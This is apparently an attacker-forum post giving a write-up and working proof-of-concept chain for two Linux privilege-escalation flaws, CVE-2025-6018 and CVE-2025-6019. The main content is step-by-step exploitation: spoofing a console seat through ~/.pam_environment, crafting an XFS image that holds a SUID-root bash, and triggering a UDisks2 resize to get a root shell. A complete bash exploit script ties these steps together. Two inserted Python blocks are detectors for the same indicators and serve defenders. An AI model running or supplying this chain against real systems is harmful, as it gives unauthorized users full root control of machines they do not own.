Hello xss.pro community,
Today I present a write-up and working PoC chain based on two recently disclosed vulnerabilities affecting major Linux distributions, as reported by BleepingComputer:
https://www.bleepingcomputer[.]com/...ts-attackers-get-root-on-major-linux-distros/
Other references used in this write-up are included at the end of the post.
This LPE chain allows full root from an unprivileged user (even over SSH) with no kernel exploits required.
Two CVEs are involved:
1. CVE-2025-6018 – Trick PAM into thinking you're physically present via crafted environment vars.
2. CVE-2025-6019 – Use UDisks2 to mount a malicious XFS image containing a SUID-root binary.
CVE-2025-6018 – Exploit PAM environment to fake "allow_active":
On openSUSE 15, PAM is configured to read ~/.pam_environment when users log in. These environment variables are loaded by pam_env and then passed to pam_systemd, which uses them to determine the session type.
By setting:
```
XDG_SEAT=seat0
XDG_VTNR=1
```
we can make systemd-logind believe we are sitting at the console. This results in Polkit granting "allow_active" permissions.
Steps:
1. Log in as an unprivileged user via SSH.
2. Create ~/.pam_environment:
```bash
echo 'XDG_SEAT OVERRIDE=seat0' > ~/.pam_environment
echo 'XDG_VTNR OVERRIDE=1' >> ~/.pam_environment
```
3. Log out and back in.
4. Verify that Polkit thinks we are a physical user:
```bash
gdbus call --system \
  --dest org.freedesktop.login1 \
  --object-path /org/freedesktop/login1 \
  --method org.freedesktop.login1.Manager.CanReboot
```
Output should be:
```
('yes',)
```
This gives access to many privileged Polkit actions.
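The following is an added defensive check, not code from the original post: it parses pam_env-format files, flags any entry that sets XDG_SEAT or XDG_VTNR (the two variables the ~/.pam_environment trick above relies on), and can walk /home to find affected users. The sample file contents are constructed, and the /home layout is an assumption.

```python
import re
from pathlib import Path

# Variables pam_systemd hands to systemd-logind to decide whether a session sits
# on a physical seat; a user-writable ~/.pam_environment must never set them.
SEAT_VARS = {"XDG_SEAT", "XDG_VTNR"}
# pam_env long form: "VAR [DEFAULT=value] [OVERRIDE=value]"; short form: "VAR=value".
_ASSIGN = re.compile(r'(DEFAULT|OVERRIDE)=("[^"]*"|\S*)')

def parse_pam_environment(text):
    """Return (variable, source, value) tuples; source is DEFAULT, OVERRIDE or '='."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):      # pam_env skips comments and blanks
            continue
        head = line.split(None, 1)
        if "=" in head[0]:                        # short form VAR=value
            var, value = line.split("=", 1)
            entries.append((var, "=", value.strip('"')))
            continue
        var, rest = head[0], (head[1] if len(head) > 1 else "")
        for src, val in _ASSIGN.findall(rest):
            entries.append((var, src, val.strip('"')))
    return entries

def seat_spoofing_entries(text):
    """Assignments to seat variables: the indicator a defender should alert on."""
    return [e for e in parse_pam_environment(text) if e[0] in SEAT_VARS]

def scan_home_dirs(home_root="/home"):
    """Map each <home>/.pam_environment that sets a seat variable to its entries (assumed layout)."""
    findings = {}
    for env_file in Path(home_root).glob("*/.pam_environment"):
        try:
            hits = seat_spoofing_entries(env_file.read_text(errors="replace"))
        except OSError:
            continue
        if hits:
            findings[str(env_file)] = hits
    return findings

# Constructed sample: the write-up's two OVERRIDE lines among benign settings.
SAMPLE = """EDITOR DEFAULT=vim
LANG=en_US.UTF-8
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
"""
```

Running scan_home_dirs() from a cron job or a configuration-audit tool turns the write-up's indicator into a recurring host check.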
CVE-2025-6019 – Mount SUID XFS via UDisks2 Resize
Details:
If a user is "allow_active", UDisks2 permits resizing of filesystems.
For XFS, the resizing logic in libblockdev temporarily mounts the image under /tmp with full privileges – but WITHOUT the nosuid and nodev flags. This means an attacker can craft an XFS image containing a SUID-root binary.
When libblockdev mounts the image to resize it, the attacker can execute their SUID binary from /tmp and gain root.
Create malicious XFS image:
```bash
# On attacker system:
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs xfs.image
mkdir mnt
mount -t xfs xfs.image mnt
cp /bin/bash mnt/
chmod 4555 mnt/bash
umount mnt
# Send image to victim machine:
scp xfs.image user@victim:
```
Exploit on victim (as allow_active user):
1. Kill auto-mounting process:
```bash
killall -KILL gvfs-udisks2-volume-monitor
```
2. Set up loop device:
```bash
udisksctl loop-setup --file ./xfs.image --no-user-interaction
```
3. Hold the image busy so it doesn't unmount:
```bash
while true; do /tmp/blockdev*/bash -p -c 'sleep 5; id' && break; done &
```
4. Trigger filesystem resize via D-Bus:
```bash
gdbus call --system \
  --dest org.freedesktop.UDisks2 \
  --object-path /org/freedesktop/UDisks2/block_devices/loop0 \
  --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
```
Expected output: Resize fails with "target is busy" but the image is mounted.
5. Run SUID shell:
```bash
/tmp/blockdev*/bash -p
```
6. Confirm root:
```
$ id
uid=65534(nobody) gid=65534(nobody) euid=0(root)
```
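As an added detection example that is not part of the original post: a parser for /proc/self/mountinfo that reports any mount under the /tmp/blockdev* prefix used above whose own options lack nosuid or nodev, which is exactly the condition the resize step depends on. The mountinfo excerpt is constructed, and the prefix is taken from the write-up rather than from libblockdev's source.

```python
import re

# Constructed /proc/self/mountinfo excerpt: the /tmp tmpfs, a loop-backed XFS mounted
# with nosuid,nodev (as a hardened udisks stack would do) and one mounted without them
# (the condition CVE-2025-6019 relies on). nosuid on /tmp does not carry to child mounts.
SAMPLE_MOUNTINFO = """\
25 1 0:22 / /tmp rw,nosuid,nodev shared:7 - tmpfs tmpfs rw
90 25 7:0 / /tmp/blockdev.safe rw,nosuid,nodev shared:50 - xfs /dev/loop0 rw,attr2
91 25 7:1 / /tmp/blockdev.unsafe rw,relatime shared:51 - xfs /dev/loop1 rw,attr2
"""

def _unescape(field):
    # mountinfo encodes space, tab, newline and backslash as \ooo octal escapes
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), field)

def parse_mountinfo(text):
    """Parse mountinfo lines into dicts: mount point, per-mount options, fstype, source."""
    mounts = []
    for line in text.splitlines():
        if " - " not in line:
            continue
        left, right = line.split(" - ", 1)      # the separator ends the optional fields
        lf, rf = left.split(), right.split()
        if len(lf) < 6 or len(rf) < 2:
            continue
        mounts.append({
            "mountpoint": _unescape(lf[4]),
            "options": set(lf[5].split(",")),   # nosuid/nodev live here, not in super options
            "fstype": rf[0],
            "source": _unescape(rf[1]),
        })
    return mounts

def unsafe_temp_mounts(text, prefix="/tmp/blockdev"):
    """Mounts under the temp prefix from the write-up that are missing nosuid or nodev."""
    return [m for m in parse_mountinfo(text)
            if m["mountpoint"].startswith(prefix)
            and not {"nosuid", "nodev"} <= m["options"]]

def check_live():
    """Run the same check against the live system; no privileges are needed to read it."""
    with open("/proc/self/mountinfo") as f:
        return unsafe_temp_mounts(f.read())

if __name__ == "__main__":
    for m in unsafe_temp_mounts(SAMPLE_MOUNTINFO):
        print("unsafe temp mount:", m["mountpoint"], m["source"], sorted(m["options"]))
```

Polling check_live() during a resize request (or from a udev/D-Bus hook) would catch an unhardened libblockdev mount the moment it appears.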
Chaining Both:
1. Exploit CVE-2025-6018 to become allow_active
2. Exploit CVE-2025-6019 to mount malicious XFS image
3. Execute root shell from /tmp/blockdev*
Example proof-of-concept (AI generated, expect bugs):
```bash
set -e
IMAGE_NAME="xfs.image"
MOUNT_NAME="mnt_xfs"
SUID_SHELL="bash"

function create_xfs_image() {
    echo "[*] Creating malicious XFS image with SUID bash shell..."
    dd if=/dev/zero of=$IMAGE_NAME bs=1M count=300 status=none
    mkfs.xfs -f $IMAGE_NAME > /dev/null
    mkdir -p $MOUNT_NAME
    mount -t xfs $IMAGE_NAME $MOUNT_NAME
    cp /bin/bash $MOUNT_NAME/$SUID_SHELL
    chmod 4555 $MOUNT_NAME/$SUID_SHELL
    umount $MOUNT_NAME
    rm -rf $MOUNT_NAME
    echo "[+] Done creating XFS image: $IMAGE_NAME"
}

function deploy_environment_trick() {
    echo "[*] Writing .pam_environment to gain allow_active status..."
    echo 'XDG_SEAT OVERRIDE=seat0' > ~/.pam_environment
    echo 'XDG_VTNR OVERRIDE=1' >> ~/.pam_environment
    echo "[*] Log out and log back in to apply environment trick..."
    echo "[!] After re-login, run this script again with '--continue'"
    exit 0
}

function verify_allow_active() {
    echo "[*] Verifying Polkit allow_active status..."
    result=$(gdbus call --system \
        --dest org.freedesktop.login1 \
        --object-path /org/freedesktop/login1 \
        --method org.freedesktop.login1.Manager.CanReboot)
    if echo "$result" | grep -q "'yes'"; then
        echo "[+] User is recognized as allow_active"
    else
        echo "[!] User is NOT allow_active"
        echo "[!] Run the script without --continue first to apply env trick."
        exit 1
    fi
}

function setup_loop_device() {
    echo "[*] Killing gvfs automounter..."
    killall -q -KILL gvfs-udisks2-volume-monitor || true
    echo "[*] Setting up loop device..."
    LOOP_OUTPUT=$(udisksctl loop-setup --file $IMAGE_NAME --no-user-interaction)
    LOOP_DEV=$(echo "$LOOP_OUTPUT" | grep -o '/dev/loop[0-9]*')
    echo "[+] Loop device: $LOOP_DEV"
}

function exploit_resize_mount() {
    echo "[*] Running background process to hold mount busy..."
    (while true; do
        /tmp/blockdev*/$SUID_SHELL -p -c 'sleep 5; id && exit' && break
    done 2>/dev/null) &
    echo "[*] Triggering Filesystem.Resize on $LOOP_DEV..."
    gdbus call --system \
        --dest org.freedesktop.UDisks2 \
        --object-path "/org/freedesktop/UDisks2/block_devices/$(basename $LOOP_DEV)" \
        --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
    echo "[*] Attempting to execute SUID-root shell from /tmp..."
    sleep 2
    /tmp/blockdev*/$SUID_SHELL -p || echo "[!] Exploit failed."
}

function cleanup() {
    echo "[*] Cleaning up..."
    udisksctl loop-delete --block-device=$LOOP_DEV --no-user-interaction || true
    rm -f $IMAGE_NAME
    echo "[+] Done."
}

# Main
if [[ "$1" == "--continue" ]]; then
    verify_allow_active
    create_xfs_image
    setup_loop_device
    exploit_resize_mount
    cleanup
else
    deploy_environment_trick
fi
```
References:
1. DBus and Polkit Introduction (u1f383.github.io): "Inspired by @4ttil4sz1a's post on the SSD-disclosure blog, I spent some time understanding how D-Bus and Polkit work on Ubuntu and other Unix-based Linux distributions, with the goal of exploring more kernel attack surfaces."
2. Bug #1812316 "systemd: lack of seat verification in PAM module p..." : Bugs : systemd package : Ubuntu (bugs.launchpad.net): "[I am sending this bug report to Ubuntu as requested by systemd at <https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports>.] As documented at <https://www.freedesktop.org/software/polkit/docs/latest/polkit.8.html>, for any action, a polkit policy can..."
3. SSD Advisory - Linux kernel hfsplus slab-out-of-bounds Write - SSD Secure Disclosure (ssd-disclosure.com): "Summary This advisory describes an out-of-bounds write vulnerability in the Linux kernel that achieves local privilege escalation on Ubuntu 22.04 for active user sessions. Credit An independent security researcher working with SSD Secure Disclosure. Vendor Response Ubuntu has released the..."